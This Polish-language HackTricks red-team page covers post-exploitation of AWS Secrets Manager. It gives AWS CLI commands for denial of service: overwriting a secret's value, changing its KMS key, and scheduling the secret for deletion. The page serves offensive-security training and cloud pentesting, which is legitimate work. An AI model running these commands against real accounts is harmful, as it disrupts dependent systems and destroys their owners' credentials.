AWS - Secrets Manager Post Exploitation

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Secrets Manager

Aby uzyskać więcej informacji, sprawdź:

pageAWS - Secrets Manager Enum

Odczytaj Secrets

Same sekrety są informacjami poufnymi, sprawdź stronę privesc, aby dowiedzieć się, jak je odczytać.

DoS Zmiana Wartości Sekretu

Zmieniając wartość sekretu, możesz zablokować cały system zależny od tej wartości.

Zauważ, że poprzednie wartości są również przechowywane, więc łatwo jest wrócić do poprzedniej wartości.

```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ --secret-id MyTestSecret \ --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` ### Zmiana klucza KMS DoS ```bash aws secretsmanager update-secret \ --secret-id MyTestSecret \ --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` ### Atak DoS na Usunięcie Sekretu

Minimalna liczba dni do usunięcia sekretu wynosi 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Nauka hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated